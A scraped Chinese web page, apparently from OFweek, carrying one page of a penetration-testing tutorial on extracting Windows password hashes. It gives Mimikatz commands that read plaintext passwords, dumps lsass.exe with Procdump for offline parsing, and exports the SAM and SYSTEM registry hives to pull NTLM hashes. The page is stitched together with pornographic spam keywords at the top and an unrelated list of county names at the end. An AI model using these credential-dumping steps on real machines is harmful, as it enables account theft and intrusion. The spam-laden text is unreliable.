高加索AV无码,99尹人网毛,韩日337p99,一级a片久久无,97色区综合,激情日韩在线一二三,日韩精品久久精品草比,婷婷久久91,亚洲天堂艹比

侵權(quán)投訴
訂閱
糾錯
加入自媒體

內(nèi)網(wǎng)滲透—獲取Windows內(nèi)Hash密碼方法總結(jié)

1、直接讀取

Mimikatz讀取明文密碼和hash時需要管理員權(quán)限。

privilege::debug           //提升至debug權(quán)限

sekurlsa::logonpasswords   //抓取密碼

image.png

image.png

2、Procdump+Mimikatz離線讀取lsass.dmp文件

Procdump是微軟官方發(fā)布的工具,可以用來將目標lsass文件導(dǎo)出。先在目標機器上上傳Procdump,導(dǎo)出lsass.dmp

procdump64.exe-accepteula-ma

lsass.exe lsass.dmp

image.png

image.png

將目標機上的lsass.dmp下載到本地后,執(zhí)行Mimikatz導(dǎo)出lsass.dmp里面的密碼和hash:

sekurlsa::minidump 目錄lsass.dmp //將導(dǎo)出的lsass.dmp載入到Mimikatz中

sekurlsa::logonpasswords full    //獲取密碼

3、通過SAM和System文件抓取密碼和Hash

首先利用注冊表命令將目標機的sam或者system文件導(dǎo)出

reg save hklmsam sam.hive

reg save hklmsystem system.hive

image.png

然后將目標機上的sam.hive和system.hive下載到本地,利用Mimikatz讀取sam和system文件獲取NTLMHash:

token::elevate

lsadump::sam

image.png

image.png

<上一頁  1  2  3  下一頁>  
聲明: 本文由入駐維科號的作者撰寫,觀點僅代表作者本人,不代表OFweek立場。如有侵權(quán)或其他問題,請聯(lián)系舉報。

發(fā)表評論

0條評論,0人參與

請輸入評論內(nèi)容...

請輸入評論/評論長度6~500個字

您提交的評論過于頻繁,請輸入驗證碼繼續(xù)

暫無評論

暫無評論

    安防 獵頭職位 更多
    文章糾錯
    x
    *文字標題:
    *糾錯內(nèi)容:
    聯(lián)系郵箱:
    *驗 證 碼:

    粵公網(wǎng)安備 44030502002758號

    云南省| 什邡市| 凤冈县| 衢州市| 宣威市| 浦北县| 邯郸县| 庆阳市| 永济市| 东丽区| 三江| 疏勒县| 伽师县| 饶平县| 巨鹿县| 长白| 郴州市| 响水县| 隆德县| 墨竹工卡县| 龙川县| 浦城县| 安塞县| 文成县| 广安市| 依安县| 年辖:市辖区| 琼结县| 广饶县| 榆林市| 枣强县| 泸州市| 华阴市| 栾城县| 淮安市| 上杭县| 九龙城区| 曲阜市| 文水县| 双城市| 通化县|